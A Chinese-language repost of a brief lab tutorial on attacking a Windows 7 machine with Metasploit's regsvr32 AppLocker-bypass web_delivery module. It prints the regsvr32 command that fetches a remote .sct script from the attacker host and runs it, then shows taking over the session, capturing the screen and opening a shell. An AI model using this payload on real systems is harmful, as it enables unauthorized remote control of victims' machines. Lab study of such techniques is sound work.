分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > IT知识

msf web_delivery模块攻击

发布时间:2023-09-06 01:52责任编辑:顾先生关键词:暂无标签

目标机:win7                    ip:192.168.31.136

攻击机:kai liunx                      ip:192.168.31.54

一.使用web_delivery模块的regsvr32_applocker_bypass_server

1.打开神器metasploit,终端输入msfconsole

2.搜索web_delivery模块,search web_delivery

3.使用命令use exploit/windows/misc/regsvr32_applocker_bypass_server,并且查看这个模块选项

4.设置攻击机ip,set lhost 192.168.31.54

5.运行,run或者rexpolit

6.复制生成的regsvr32 /s /n /u /i:http://192.168.31.54:8080/Yos79zYgod.sct scrobj.dll,拿到目标机win7上去运行.

7.回到攻击机kai liunx就可以看到已经成功监听,并返回了一个session

8.输入sessions,查看session内容

9.输入命令sessions -i 1,这样就控制到了目标机了

10.截取当前桌面屏幕,并且去root目录下查看

11.输入shell,来到我们熟悉的界面,随便执行一个命令看看

msf web_delivery模块攻击

原文地址:https://www.cnblogs.com/haiyan123/p/8986501.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved